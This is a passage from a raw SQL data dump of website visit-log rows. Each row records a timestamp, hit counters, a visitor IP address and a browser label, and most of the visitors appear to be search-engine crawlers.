1551050899,1,1,0,0,'207.46.13.135','other'),(391046,1551050960,1,1,0,0,'54.36.150.154','other'),(391047,1551050966,1,1,0,0,'66.249.64.62','chrome'),(391048,1551051085,1,1,0,0,'8.29.198.25','other'),(391049,1551051209,1,1,0,0,'54.36.148.149','other'),(391050,1551051540,1,1,0,0,'54.36.149.39','other'),(391051,1551051649,1,1,0,0,'54.36.150.84','other'),(391052,1551051865,1,1,0,0,'54.36.148.183','other'),(391053,1551051901,2,2,0,0,'66.249.64.30','chrome'),(391054,1551052035,1,1,0,0,'54.36.148.245','other'),(391055,1551052346,1,1,0,0,'54.36.148.197','other'),(391056,1551052487,1,1,0,0,'54.36.150.95','other'),(391057,1551052679,1,1,0,0,'46.229.168.148','other'),(391058,1551052751,1,1,0,0,'54.36.148.214','other'),(391059,1551053135,1,1,0,0,'46.229.168.144','other'),(391060,1551053385,1,1,0,0,'54.36.150.127','other'),(391061,1551053492,1,1,0,0,'54.36.148.187','other'),(391062,1551053557,1,1,0,0,'54.36.149.106','other'),(391063,1551053635,2,2,0,0,'207.46.13.28','other'),(391064,1551053675,1,1,0,0,'54.36.149.30','other'),(391065,1551053846,1,1,0,0,'66.249.64.58','chrome'),(391066,1551053999,1,1,0,0,'46.229.168.151','other'),(391067,1551054118,1,1,0,0,'95.108.213.4','other'),(391068,1551054206,2,2,0,0,'178.154.244.11','other'),(391069,1551054425,1,1,0,0,'54.36.149.3','other'),(391070,1551054453,1,1,0,0,'54.36.150.170','other'),(391071,1551054651,1,1,0,0,'54.36.148.240','other'),(391072,1551054908,2,2,0,0,'66.249.64.29','chrome'),(391073,1551055144,1,1,0,0,'46.229.168.130','other'),(391074,1551055353,1,1,0,0,'66.249.64.31','chrome'),(391075,1551055543,2,2,0,0,'207.46.13.28','other'),(391076,1551055836,1,1,0,0,'216.244.66.241','other'),(391077,1551055941,1,1,0,0,'54.36.150.165','other'),(391078,1551055982,1,1,0,0,'54.36.148.140','other'),(391079,1551056024,1,1,0,0,'207.46.13.45','other'),(391080,1551056346,1,1,0,0,'66.249.64.30','chrome'),(391081,1551056403,1,1,0,0,'54.36.150.87','other'),(391082,1551057160,1,1,0,0,'46.229.168.140','other'),(391083,1551057566,2,2,0,0,'207.46.13.28','other'),(391084,1551057647,1,1,0,0,'46.229.168.134','other'),(391085,1551058094,1,1,0,0,'5.188.210.65','chrome'),(391086,1551058234,1,1,0,0,'54.36.148.67','other'),(391087,1551058318,1,1,0,0,'54.36.148.70','other'),(391088,1551058365,1,1,0,0,'54.36.149.2','other'),(391089,1551058589,1,1,0,0,'207.46.13.135','other'),(391090,1551059041,1,1,0,0,'54.36.150.113','other'),(391091,1551059370,1,1,0,0,'207.46.13.45','other'),(391092,1551059642,1,1,0,0,'207.46.13.28','other'),(391093,1551059924,1,1,0,0,'46.229.168.152','other'),(391094,1551060511,1,1,0,0,'54.36.148.99','other'),(391095,1551060590,1,1,0,0,'66.249.64.30','chrome'),(391096,1551060610,1,1,0,0,'54.36.150.9','other'),(391097,1551060614,1,1,0,0,'54.36.148.121','other'),(391098,1551060643,1,1,0,0,'8.29.198.27','other'),(391099,1551060673,1,1,0,0,'54.36.150.154','other'),(391100,1551060970,1,1,0,0,'46.229.168.150','other'),(391101,1551061178,1,1,0,0,'64.246.187.42','firefox'),(391102,1551061223,2,2,0,0,'66.249.64.29','chrome'),(391103,1551061345,1,1,0,0,'54.36.149.30','other'),(391104,1551061607,1,1,0,0,'66.249.64.30','chrome'),(391105,1551061907,1,1,0,0,'8.29.198.27','other'),(391106,1551061931,1,1,0,0,'54.36.150.81','other'),(391107,1551061967,1,1,0,0,'54.36.150.87','other'),(391108,1551062041,1,1,0,0,'46.229.168.142','other'),(391109,1551062174,2,2,0,0,'35.164.74.31','chrome'),(391110,1551062290,1,1,0,0,'54.36.149.94','other'),(391111,1551062975,1,1,0,0,'54.36.149.100','other'),(391112,1551063124,1,1,0,0,'54.36.150.27','other'),(391113,1551063232,1,1,0,0,'207.46.13.135','other'),(391114,1551063460,1,1,0,0,'54.36.148.78','other'),(391115,1551063552,1,1,0,0,'66.249.64.31','chrome'),(391116,1551063681,1,1,0,0,'5.188.210.65','chrome'),(391117,1551063687,1,1,0,0,'54.36.148.94','other'),(391118,1551063850,1,1,0,0,'54.36.148.101','other'),(391119,1551063993,1,1,0,0,'216.244.66.241','other'),(391120,1551064311,1,1,0,0,'207.46.13.28','other'),(391121,1551064616,1,1,0,0,'54.36.148.29','other'),(391122,1551064722,1,1,0,0,'54.36.148.243','other'),(391123,1551064774,1,1,0,0,'66.249.64.30','chrome'),(391124,1551064787,1,1,0,0,'54.36.150.22','other'),(391125,1551064820,1,1,0,0,'54.36.148.62','other'),(391126,1551064861,1,1,0,0,'54.36.148.206','other'),(391127,1551065295,1,1,0,0,'66.249.64.29','chrome'),(391128,1551065388,1,1,0,0,'54.36.148.130','other'),(391129,1551067266,1,1,0,0,'46.229.168.145','other'),(391130,1551067403,1,1,0,0,'54.36.148.56','other'),(391131,1551067564,1,1,0,0,'54.36.150.119','other'),(391132,1551067611,1,1,0,0,'207.46.13.86','other'),(391133,1551067879,1,1,0,0,'46.229.168.140','other'),(391134,1551068219,1,1,0,0,'66.249.64.58','chrome'),(391135,1551068456,1,1,0,0,'46.229.168.136','other'),(391136,1551068583,1,1,0,0,'46.229.168.135','other'),(391137,1551068612,1,1,0,0,'54.36.148.215','other'),(391138,1551068750,1,1,0,0,'46.229.168.143','other'),(391139,1551070262,1,1,0,0,'66.249.64.30','chrome'),(391140,1551070538,1,1,0,0,'46.229.168.143','other'),(391141,1551071229,1,1,0,0,'40.77.167.62','other'),(391142,1551071321,1,1,0,0,'54.36.150.6','other'),(391143,1551071478,1,1,0,0,'8.29.198.27','other'),(391144,1551071554,1,1,0,0,'54.36.150.172','other'),(391145,1551071631,1,1,0,0,'46.229.168.148','other'),(391146,1551071656,1,1,0,0,'109.70.100.22','chrome'),(391147,1551071906,1,1,0,0,'54.36.148.0','other'),(391148,1551072735,1,1,0,0,'8.29.198.25','other'),(391149,1551072823,1,1,0,0,'54.36.148.114','other'),(391150,1551072995,1,1,0,0,'54.36.148.88','other'),(391151,1551073584,1,1,0,0,'46.229.168.140','other'),(391152,1551073774,1,1,0,0,'54.36.148.107','other'),(391153,1551073922,1,1,0,0,'54.36.148.160','other'),(391154,1551073999,1,1,0,0,'37.9.113.148','other'),(391155,1551074103,1,1,0,0,'46.229.168.132','other'),(391156,1551074148,1,1,0,0,'178.154.244.11','other'),(391157,1551074183,1,1,0,0,'37.9.113.20','other'),(391158,1551074271,3,3,0,0,'5.45.207.19','other'),(391159,1551074272,2,2,0,0,'157.55.39.222','other'),(391160,1551074325,1,1,0,0,'54.36.148.205','other'),(391161,1551074364,1,1,0,0,'141.8.142.103','other'),(391162,1551074523,1,1,0,0,'213.180.203.17','other'),(391163,1551074593,1,1,0,0,'40.77.167.62','other'),(391164,1551074598,1,1,0,0,'54.36.150.44','other'),(391165,1551074635,1,1,0,0,'178.175.143.234','other'),(391166,1551074729,1,1,0,0,'87.250.224.81','other'),(391167,1551074747,1,1,0,0,'87.250.224.64','other'),(391168,1551074883,1,1,0,0,'46.229.168.136','other'),(391169,1551075189,1,1,0,0,'141.8.183.23','other'),(391170,1551075243,1,1,0,0,'37.9.113.20','other'),(391171,1551075284,1,1,0,0,'54.36.150.12','other'),(391172,1551075342,2,2,0,0,'5.255.253.16','other'),(391173,1551075433,1,1,0,0,'66.249.64.60','chrome'),(391174,1551075608,1,1,0,0,'54.36.150.25','other'),(391175,1551075903,1,1,0,0,'91.196.178.133','firefox'),(391176,1551076007,1,1,0,0,'95.108.181.96','other'),(391177,1551076055,2,2,0,0,'178.154.244.49','other'),(391178,1551076289,1,1,0,0,'213.180.203.48','other'),(391179,1551076300,1,1,0,0,'37.9.113.20','other'),(391180,1551076487,1,1,0,0,'54.36.148.98','other'),(391181,1551076605,1,1,0,0,'5.45.207.19','other'),(391182,1551076725,1,1,0,0,'40.77.167.171','other'),(391183,1551076738,1,1,0,0,'178.154.244.11','other'),(391184,1551076740,2,2,0,0,'216.244.66.241','other'),(391185,1551076880,1,1,0,0,'66.249.64.30','chrome'),(391186,1551076950,2,2,0,0,'157.55.39.222','other'),(391187,1551077043,1,1,0,0,'178.154.171.27','other'),(391188,1551077046,1,1,0,0,'87.250.224.64','other'),(391189,1551077048,1,1,0,0,'66.249.64.62','chrome'),(391190,1551077216,1,1,0,0,'54.36.148.16','other'),(391191,1551077270,2,2,0,0,'37.9.113.103','other'),(391192,1551077295,1,1,0,0,'178.154.244.21','other'),(391193,1551077387,1,1,0,0,'91.196.178.161','chrome'),(391194,1551077469,1,1,0,0,'193.227.96.137','chrome'),(391195,1551077995,1,1,0,0,'141.8.183.23','other'),(391196,1551078761,1,1,0,0,'54.36.148.180','other'),(391197,1551078814,2,2,0,0,'91.196.178.161','chrome'),(391198,1551078905,1,1,0,0,'46.164.186.22','msie'),(391199,1551078913,1,1,0,0,'91.196.178.52','chrome'),(391200,1551078932,1,1,0,0,'91.196.178.93','chrome'),(391201,1551079308,1,1,0,0,'54.36.150.80','other'),(391202,1551079447,1,1,0,0,'157.55.39.62','other'),(391203,1551079667,1,1,0,0,'54.36.148.215','other'),(391204,1551079687,1,1,0,0,'66.249.64.31','chrome'),(391205,1551079790,1,1,0,0,'91.196.178.161','chrome'),(391206,1551079967,1,1,0,0,'91.196.178.93','chrome'),(391207,1551080140,1,1,0,0,'95.132.41.2','chrome'),(391208,1551080195,2,2,0,0,'91.196.178.93','firefox'),(391209,1551080777,1,1,0,0,'141.8.142.103','other'),(391210,1551080812,1,1,0,0,'54.36.148.20','other'),(391211,1551080860,1,1,0,0,'46.229.168.138','other'),(391212,1551081055,1,1,0,0,'54.36.150.113','other'),(391213,1551081081,1,1,0,0,'95.163.255.107','other'),(391214,1551081319,1,1,0,0,'54.36.148.57','other'),(391215,1551081601,1,1,0,0,'178.154.200.48','other'),(391216,1551081637,1,1,0,0,'141.8.142.162','other'),(391217,1551081745,1,1,0,0,'91.196.178.161','chrome'),(391218,1551081759,1,1,0,0,'91.196.178.94','chrome'),(391219,1551081761,1,1,0,0,'54.36.148.133','other'),(391220,1551081982,1,1,0,0,'66.249.64.31','chrome'),(391221,1551082207,1,1,0,0,'91.196.178.93','firefox'),(391222,1551082309,1,1,0,0,'8.29.198.25','other'),(391223,1551082534,1,1,0,0,'46.229.168.146','other'),(391224,1551082587,1,1,0,0,'66.249.64.30','chrome'),(391225,1551082632,1,1,0,0,'3.91.2.189','other'),(391226,1551083110,1,1,0,0,'46.229.168.132','other'),(391227,1551083139,2,2,0,0,'91.196.178.161','chrome'),(391228,1551083256,1,1,0,0,'54.36.150.166','other'),(391229,1551083436,1,1,0,0,'54.36.148.159','other'),(391230,1551083572,1,1,0,0,'8.29.198.27','other'),(391231,1551083598,1,1,0,0,'46.229.168.138','other'),(391232,1551083627,1,1,0,0,'134.249.146.125','chrome'),(391233,1551083652,1,1,0,0,'66.249.64.62','chrome'),(391234,1551083809,1,1,0,0,'54.36.150.154','other'),(391235,1551083859,1,1,0,0,'54.36.150.113','other'),(391236,1551084079,1,1,0,0,'91.196.178.94','chrome'),(391237,1551084406,1,1,0,0,'46.229.168.150','other'),(391238,1551085130,1,1,0,0,'54.36.150.60','other'),(391239,1551085351,1,1,0,0,'54.36.150.118','other'),(391240,1551085373,1,1,0,0,'92.113.13.3','chrome'),(391241,1551085434,1,1,0,0,'37.52.107.42','chrome'),(391242,1551086077,1,1,0,0,'91.196.178.136','firefox'),(391243,1551086116,1,1,0,0,'66.249.64.60','chrome'),(391244,1551086183,1,1,0,0,'37.53.191.118','chrome'),(391245,1551086245,1,1,0,0,'54.36.148.55','other'),(391246,1551086631,1,1,0,0,'66.249.64.29','chrome'),(391247,1551086794,1,1,0,0,'46.229.168.141','other'),(391248,1551086832,1,1,0,0,'157.55.39.52','other'),(391249,1551087379,1,1,0,0,'46.229.168.138','other'),(391250,1551087586,1,1,0,0,'109.227.92.244','chrome'),(391251,1551087714,1,1,0,0,'216.244.66.241','other'),(391252,1551087759,1,1,0,0,'66.249.64.58','chrome'),(391253,1551087811,1,1,0,0,'54.36.150.39','other'),(391254,1551087953,1,1,0,0,'54.36.150.164','other'),(391255,1551088105,1,1,0,0,'91.196.178.93','firefox'),(391256,1551088143,1,1,0,0,'207.46.13.104','other'),(391257,1551088147,1,1,0,0,'91.196.178.169','chrome'),(391258,1551088204,1,1,0,0,'54.36.148.55','other'),(391259,1551088448,1,1,0,0,'157.55.39.244','other'),(391260,1551088768,1,1,0,0,'157.55.39.222','other'),(391261,1551088772,2,2,0,0,'157.55.39.253','other'),(391262,1551088808,1,1,0,0,'54.36.150.32','other'),(391263,1551089130,1,1,0,0,'66.249.64.60','chrome'),(391264,1551089805,1,1,0,0,'91.196.178.93','firefox'),(391265,1551089937,1,1,0,0,'54.36.150.104','other'),(391266,1551090105,1,1,0,0,'91.196.177.46','firefox'),(391267,1551090153,1,1,0,0,'157.55.39.253','other'),(391268,1551090158,7,7,0,0,'157.55.39.222','other'),(391269,1551090169,8,8,0,0,'207.46.13.86','other'),(391270,1551090346,1,1,0,0,'54.36.150.155','other'),(391271,1551090397,1,1,0,0,'66.249.64.60','chrome'),(391272,1551090597,1,1,0,0,'54.36.149.27','other'),(391273,1551090741,1,1,0,0,'46.229.168.150','other'),(391274,1551090837,1,1,0,0,'54.36.148.232','other'),(391275,1551090900,3,3,0,0,'91.196.178.59','chrome'),(391276,1551091023,1,1,0,0,'54.36.150.56','other'),(391277,1551091031,1,1,0,0,'216.244.66.241','other'),(391278,1551091049,1,1,0,0,'91.196.178.93','firefox'),(391279,1551091259,1,1,0,0,'66.249.64.30','chrome'),(391280,1551091302,1,1,0,0,'54.36.150.116','other'),(391281,1551091617,1,1,0,0,'54.36.149.62','other'),(391282,1551091656,1,1,0,0,'66.249.64.29','chrome'),(391283,1551091774,1,1,0,0,'5.45.207.19','other'),(391284,1551091985,1,1,0,0,'54.36.148.85','other'),(391285,1551092199,1,1,0,0,'91.196.178.42','chrome'),(391286,1551092338,1,1,0,0,'66.249.64.58','chrome'),(391287,1551092662,1,1,0,0,'54.36.148.115','other'),(391288,1551092756,1,1,0,0,'46.201.85.224','chrome'),(391289,1551092772,1,1,0,0,'54.36.150.115','other'),(391290,1551092923,1,1,0,0,'54.36.148.244','other'),(391291,1551092989,1,1,0,0,'194.44.222.104','firefox'),(391292,1551092995,1,1,0,0,'216.244.66.241','other'),(391293,1551093076,1,1,0,0,'91.196.178.93','firefox'),(391294,1551093143,1,1,0,0,'8.29.198.26','other'),(391295,1551093264,1,1,0,0,'157.55.39.253','other'),(391296,1551094218,1,1,0,0,'46.229.168.129','other'),(391297,1551094231,1,1,0,0,'66.249.64.60','chrome'),(391298,1551094416,1,1,0,0,'8.29.198.27','other'),(391299,1551094489,2,2,0,0,'66.249.64.30','chrome'),(391300,1551094783,1,1,0,0,'157.55.39.149','other'),(391301,1551096048,1,1,0,0,'54.36.148.247','other'),(391302,1551096387,1,1,0,0,'54.36.148.136','other'),(391303,1551096389,2,2,0,0,'66.249.64.30','chrome'),(391304,1551096409,1,1,0,0,'66.249.64.58','chrome'),(391305,1551096642,1,1,0,0,'95.163.255.119','other'),(391306,1551096710,1,1,0,0,'46.229.168.142','other'),(391307,1551096937,1,1,0,0,'54.36.148.203','other'),(391308,1551097099,1,1,0,0,'54.36.148.236','other'),(391309,1551097278,1,1,0,0,'37.52.107.42','chrome'),(391310,1551097868,1,1,0,0,'91.196.178.169','firefox'),(391311,1551097906,1,1,0,0,'93.170.118.117','chrome'),(391312,1551097968,1,1,0,0,'54.36.149.16','other'),(391313,1551098044,1,1,0,0,'54.36.149.68','other'),(391314,1551098281,1,1,0,0,'54.36.149.95','other'),(391315,1551098346,1,1,0,0,'54.36.150.102','other'),(391316,1551098370,1,1,0,0,'216.244.66.241','other'),(391317,1551098399,1,1,0,0,'46.229.168.145','other'),(391318,1551098593,1,1,0,0,'54.36.149.22','other'),(391319,1551098622,1,1,0,0,'91.196.177.46','firefox'),(391320,1551098852,1,1,0,0,'195.189.249.165','chrome'),(391321,1551099458,1,1,0,0,'66.249.64.60','chrome'),(391322,1551100030,1,1,0,0,'46.229.168.133','other'),(391323,1551100200,1,1,0,0,'54.36.148.116','other'),(391324,1551100379,1,1,0,0,'46.229.168.146','other'),(391325,1551100410,1,1,0,0,'54.36.148.147','other'),(391326,1551100531,1,1,0,0,'46.229.168.148','other'),(391327,1551100536,1,1,0,0,'54.36.149.23','other'),(391328,1551100569,1,1,0,0,'109.70.100.19','chrome'),(391329,1551100832,3,3,0,0,'216.244.66.241','other'),(391330,1551100858,1,1,0,0,'94.153.229.229','chrome'),(391331,1551101218,1,1,0,0,'91.196.178.94','chrome'),(391332,1551101367,1,1,0,0,'157.55.39.97','other'),(391333,1551101519,1,1,0,0,'95.132.36.66','firefox'),(391334,1551101609,1,1,0,0,'66.249.64.29','chrome'),(391335,1551101748,1,1,0,0,'54.36.148.173','other'),(391336,1551101773,1,1,0,0,'46.200.32.73','chrome'),(391337,1551101840,1,1,0,0,'54.36.150.99','other'),(391338,1551102136,1,1,0,0,'91.196.178.81','firefox'),(391339,1551102179,1,1,0,0,'66.249.64.30','chrome'),(391340,1551102340,1,1,0,0,'54.36.148.138','other'),(391341,1551102389,1,1,0,0,'54.36.149.57','other'),(391342,1551102577,1,1,0,0,'54.36.148.236','other'),(391343,1551103197,1,1,0,0,'46.229.168.148','other'),(391344,1551103271,1,1,0,0,'46.211.47.170','chrome'),(391345,1551103440,1,1,0,0,'91.196.177.46','firefox'),(391346,1551103674,1,1,0,0,'46.166.190.156','other'),(391347,1551103796,1,1,0,0,'54.36.148.226','other'),(391348,1551103863,3,3,0,0,'66.249.64.30','chrome'),(391349,1551103886,1,1,0,0,'40.77.167.91','other'),(391350,1551103973,1,1,0,0,'8.29.198.25','other'),(391351,1551104079,1,1,0,0,'66.249.64.31','chrome'),(391352,1551104175,1,1,0,0,'54.36.150.117','other'),(391353,1551104589,1,1,0,0,'18.223.133.101','other'),(391354,1551104595,1,1,0,0,'66.249.64.29','chrome'),(391355,1551104770,1,1,0,0,'91.196.178.94','chrome'),(391356,1551104891,1,1,0,0,'54.36.148.225','other'),(391357,1551105239,1,1,0,0,'8.29.198.26','other'),(391358,1551105416,2,2,0,0,'66.249.64.60','chrome'),(391359,1551105596,1,1,0,0,'54.36.150.40','other'),(391360,1551105729,1,1,0,0,'66.249.64.29','chrome'),(391361,1551105815,1,1,0,0,'207.46.13.102','other'),(391362,1551105831,1,1,0,0,'91.196.178.94','chrome'),(391363,1551105897,1,1,0,0,'157.55.39.97','other'),(391364,1551106472,1,1,0,0,'54.36.148.54','other'),(391365,1551106487,1,1,0,0,'46.229.168.137','other'),(391366,1551106548,1,1,0,0,'54.36.148.9','other'),(391367,1551106562,1,1,0,0,'46.229.168.139','other'),(391368,1551106612,1,1,0,0,'77.247.181.163','chrome'),(391369,1551106973,1,1,0,0,'157.55.39.149','other'),(391370,1551107220,1,1,0,0,'213.108.41.211','chrome'),(391371,1551107383,1,1,0,0,'94.100.221.234','chrome'),(391372,1551107738,1,1,0,0,'54.36.149.23','other'),(391373,1551107773,2,2,0,0,'95.213.141.126','opera'),(391374,1551107826,1,1,0,0,'77.247.181.163','chrome'),(391375,1551108235,1,1,0,0,'66.249.64.29','chrome'),(391376,1551108254,1,1,0,0,'40.77.167.157','other'),(391377,1551108298,2,2,0,0,'5.45.207.79','other'),(391378,1551108470,1,1,0,0,'37.9.113.20','other'),(391379,1551108653,1,1,0,0,'46.229.168.130','other'),(391380,1551108700,1,1,0,0,'5.45.207.19','other'),(391381,1551108792,3,3,0,0,'178.154.244.11','other'),(391382,1551108887,4,4,0,0,'216.244.66.241','other'),(391383,1551108891,1,1,0,0,'54.36.149.55','other'),(391384,1551109243,1,1,0,0,'66.249.64.29','chrome'),(391385,1551109300,1,1,0,0,'66.249.64.62','chrome'),(391386,1551109415,1,1,0,0,'87.250.224.65','other'),(391387,1551109473,1,1,0,0,'37.9.113.20','other'),(391388,1551109593,1,1,0,0,'54.36.150.154','other'),(391389,1551109694,5,5,0,0,'178.154.244.11','other'),(391390,1551109966,1,1,0,0,'54.36.148.186','other'),(391391,1551110027,1,1,0,0,'141.8.142.74','other'),(391392,1551110100,1,1,0,0,'178.154.171.24','other'),(391393,1551110104,1,1,0,0,'178.154.200.48','other'),(391394,1551110115,1,1,0,0,'54.36.149.95','other'),(391395,1551110210,2,2,0,0,'5.45.207.19','other'),(391396,1551110383,1,1,0,0,'178.154.171.69','other'),(391397,1551110444,1,1,0,0,'213.180.203.17','other'),(391398,1551110463,1,1,0,0,'54.36.148.198','other'),(391399,1551110517,1,1,0,0,'87.250.224.107','other'),(391400,1551110529,1,1,0,0,'141.8.142.191','other'),(391401,1551110543,1,1,0,0,'141.8.142.81','other'),(391402,1551110673,2,2,0,0,'95.108.181.54','other'),(391403,1551110802,1,1,0,0,'46.229.168.147','other'),(391404,1551110966,1,1,0,0,'5.45.207.8','other'),(391405,1551110969,1,1,0,0,'5.255.253.16','other'),(391406,1551111009,1,1,0,0,'213.180.203.23','other'),(391407,1551111062,1,1,0,0,'141.8.132.16','other'),(391408,1551111173,1,1,0,0,'95.108.181.83','other'),(391409,1551111310,1,1,0,0,'66.249.64.29','chrome'),(391410,1551111330,1,1,0,0,'5.45.207.79','other'),(391411,1551111340,1,1,0,0,'95.108.181.75','other'),(391412,1551111481,2,2,0,0,'178.154.244.11','other'),(391413,1551111504,1,1,0,0,'207.46.13.102','other'),(391414,1551111588,1,1,0,0,'54.36.148.151','other'),(391415,1551111684,1,1,0,0,'37.9.113.103','other'),(391416,1551111686,1,1,0,0,'37.9.113.20','other'),(391417,1551111965,1,1,0,0,'66.249.64.62','chrome'),(391418,1551112178,1,1,0,0,'94.153.199.66','firefox'),(391419,1551112396,2,2,0,0,'66.249.64.58','chrome'),(391420,1551112742,1,1,0,0,'91.196.178.30','chrome'),(391421,1551112807,1,1,0,0,'66.249.64.29','chrome'),(391422,1551112868,1,1,0,0,'46.229.168.133','other'),(391423,1551112947,1,1,0,0,'46.211.97.146','chrome'),(391424,1551113309,1,1,0,0,'5.45.207.19','other'),(391425,1551113490,1,1,0,0,'91.196.178.70','chrome'),(391426,1551113688,1,1,0,0,'54.36.150.172','other'),(391427,1551113769,2,2,0,0,'207.46.13.27','other'),(391428,1551114042,1,1,0,0,'54.36.150.83','other'),(391429,1551114045,1,1,0,0,'95.163.255.103','other'),(391430,1551114159,1,1,0,0,'54.36.150.88','other'),(391431,1551114404,1,1,0,0,'157.55.39.152','other'),(391432,1551114507,1,1,0,0,'54.36.150.144','other'),(391433,1551114616,1,1,0,0,'66.249.64.30','chrome'),(391434,1551114659,1,1,0,0,'178.154.244.11','other'),(391435,1551114663,1,1,0,0,'141.8.142.103','other'),(391436,1551114810,1,1,0,0,'8.29.198.25','other'),(391437,1551114817,2,2,0,0,'207.46.13.27','other'),(391438,1551115074,2,2,0,0,'5.45.207.19','other'),(391439,1551115192,1,1,0,0,'54.36.149.92','other'),(391440,1551115389,1,1,0,0,'54.36.148.251','other'),(391441,1551115488,1,1,0,0,'54.36.149.54','other'),(391442,1551115519,1,1,0,0,'207.46.13.102','other'),(391443,1551115760,1,1,0,0,'178.121.250.160','chrome'),(391444,1551115792,1,1,0,0,'54.36.148.104','other'),(391445,1551115890,1,1,0,0,'5.45.207.79','other'),(391446,1551115898,1,1,0,0,'178.154.244.11','other'),(391447,1551116072,1,1,0,0,'8.29.198.25','other'),(391448,1551116241,1,1,0,0,'66.249.64.31','chrome'),(391449,1551116250,1,1,0,0,'37.9.113.20','other'),(391450,1551116361,1,1,0,0,'66.249.64.29','chrome'),(391451,1551117034,1,1,0,0,'180.76.15.5','other'),(391452,1551117047,1,1,0,0,'54.36.148.18','other'),(391453,1551117573,1,1,0,0,'66.249.64.62','chrome'),(391454,1551117576,2,2,0,0,'46.229.168.149','other'),(391455,1551117660,1,1,0,0,'5.45.207.19','other'),(391456,1551117857,1,1,0,0,'66.249.64.31','chrome'),(391457,1551118295,1,1,0,0,'54.36.148.143','other'),(391458,1551118623,1,1,0,0,'66.249.64.62','chrome'),(391459,1551118634,2,2,0,0,'66.249.64.58','chrome'),(391460,1551118661,1,1,0,0,'54.36.148.108','other'),(391461,1551118782,1,1,0,0,'54.36.148.126','other'),(391462,1551118837,1,1,0,0,'46.229.168.136','other'),(391463,1551118839,1,1,0,0,'66.249.64.29','chrome'),(391464,1551118893,1,1,0,0,'54.36.148.242','other'),(391465,1551119065,1,1,0,0,'54.36.149.3','other'),(391466,1551119121,2,2,0,0,'66.249.64.31','chrome'),(391467,1551119459,1,1,0,0,'46.229.168.152','other'),(391468,1551119655,1,1,0,0,'157.55.39.51','other'),(391469,1551119725,1,1,0,0,'54.36.148.67','other'),(391470,1551119765,1,1,0,0,'87.240.53.31','msie'),(391471,1551119980,1,1,0,0,'54.36.148.236','other'),(391472,1551120077,1,1,0,0,'54.36.148.182','other'),(391473,1551120267,1,1,0,0,'216.244.66.241','other'),(391474,1551120667,1,1,0,0,'46.229.168.139','other'),(391475,1551120832,1,1,0,0,'54.36.149.53','other'),(391476,1551121070,1,1,0,0,'54.36.150.38','other'),(391477,1551121241,1,1,0,0,'54.36.150.30','other'),(391478,1551121247,1,1,0,0,'13.66.139.0','other'),(391479,1551121320,1,1,0,0,'66.249.64.60','chrome'),(391480,1551121321,1,1,0,0,'46.229.168.147','other'),(391481,1551121496,1,1,0,0,'5.45.207.79','other'),(391482,1551121499,1,1,0,0,'141.8.142.103','other'),(391483,1551121545,1,1,0,0,'54.36.148.218','other'),(391484,1551121555,1,1,0,0,'66.249.64.30','chrome'),(391485,1551121909,1,1,0,0,'46.229.168.137','other'),(391486,1551122227,2,2,0,0,'216.244.66.241','other'),(391487,1551122376,1,1,0,0,'46.229.168.132','other'),(391488,1551122617,1,1,0,0,'54.36.150.80','other'),(391489,1551122710,1,1,0,0,'157.55.39.72','other'),(391490,1551122763,2,2,0,0,'207.46.13.170','other'),(391491,1551122772,1,1,0,0,'66.249.64.30','chrome'),(391492,1551123215,1,1,0,0,'66.249.64.31','chrome'),(391493,1551123579,1,1,0,0,'54.36.149.81','other'),(391494,1551123783,1,0,1,0,'66.249.64.30',''),(391495,1551124057,1,1,0,0,'54.36.148.114','other'),(391496,1551124089,1,1,0,0,'91.209.11.236','other'),(391497,1551124247,1,1,0,0,'66.249.64.31','chrome'),(391498,1551124325,1,1,0,0,'54.36.148.124','other'),(391499,1551124328,1,1,0,0,'91.196.178.134','chrome'),(391500,1551124494,1,1,0,0,'54.36.149.104','other'),(391501,1551124517,1,1,0,0,'46.229.168.149','other'),(391502,1551124692,1,1,0,0,'180.76.15.13','other'),(391503,1551124992,1,1,0,0,'54.36.150.152','other'),(391504,1551125234,1,1,0,0,'54.36.150.165','other'),(391505,1551125376,2,2,0,0,'66.249.64.30','chrome'),(391506,1551125648,1,1,0,0,'8.29.198.27','other'),(391507,1551125965,1,1,0,0,'46.229.168.149','other'),(391508,1551126013,1,1,0,0,'46.229.168.148','other'),(391509,1551126037,1,1,0,0,'54.36.148.57','other'),(391510,1551126549,1,1,0,0,'178.17.170.23','chrome'),(391511,1551126703,1,1,0,0,'46.229.168.151','other'),(391512,1551126704,1,1,0,0,'66.249.64.29','chrome'),(391513,1551126771,1,1,0,0,'207.46.13.170','other'),(391514,1551126907,1,1,0,0,'8.29.198.27','other'),(391515,1551126967,1,1,0,0,'199.195.250.77','chrome'),(391516,1551126990,1,1,0,0,'54.36.148.244','other'),(391517,1551127567,1,1,0,0,'194.44.96.163','chrome'),(391518,1551127849,1,1,0,0,'216.244.66.241','other'),(391519,1551128078,2,2,0,0,'80.93.116.53','chrome'),(391520,1551128379,1,1,0,0,'54.36.148.204','other'),(391521,1551128736,1,1,0,0,'54.36.148.248','other'),(391522,1551129058,2,2,0,0,'66.249.64.31','chrome'),(391523,1551129344,1,1,0,0,'54.36.150.25','other'),(391524,1551129853,1,1,0,0,'54.36.148.129','other'),(391525,1551130033,1,1,0,0,'157.55.39.72','other'),(391526,1551130099,1,1,0,0,'54.36.150.121','other'),(391527,1551130181,1,1,0,0,'54.36.150.120','other'),(391528,1551130207,2,2,0,0,'216.244.66.241','other'),(391529,1551130244,1,1,0,0,'54.36.149.10','other'),(391530,1551130328,1,1,0,0,'54.36.148.115','other'),(391531,1551130944,1,1,0,0,'54.36.150.188','other'),(391532,1551131135,1,1,0,0,'46.229.168.142','other'),(391533,1551131162,1,1,0,0,'54.36.150.141','other'),(391534,1551131204,1,1,0,0,'66.249.64.29','chrome'),(391535,1551131314,1,1,0,0,'54.36.150.31','other'),(391536,1551131640,1,1,0,0,'54.36.150.62','other'),(391537,1551131756,1,1,0,0,'54.36.148.160','other'),(391538,1551132000,3,3,0,0,'66.249.64.31','chrome'),(391539,1551132020,1,1,0,0,'207.46.13.170','other'),(391540,1551132132,1,1,0,0,'54.36.148.135','other'),(391541,1551132448,1,1,0,0,'66.249.64.58','chrome'),(391542,1551132764,2,2,0,0,'216.244.66.241','other'),(391543,1551132822,1,1,0,0,'54.36.148.19','other'),(391544,1551132860,1,1,0,0,'54.36.149.98','other'),(391545,1551133131,1,1,0,0,'31.148.221.168','firefox'),(391546,1551133135,1,1,0,0,'54.36.150.26','other'),(391547,1551133367,1,1,0,0,'46.166.190.152','other'),(391548,1551133437,1,1,0,0,'207.46.13.222','other'),(391549,1551134126,1,1,0,0,'54.36.150.122','other'),(391550,1551134166,2,2,0,0,'157.55.39.72','other'),(391551,1551134299,1,1,0,0,'66.249.64.58','chrome'),(391552,1551134502,1,1,0,0,'91.209.11.236','other'),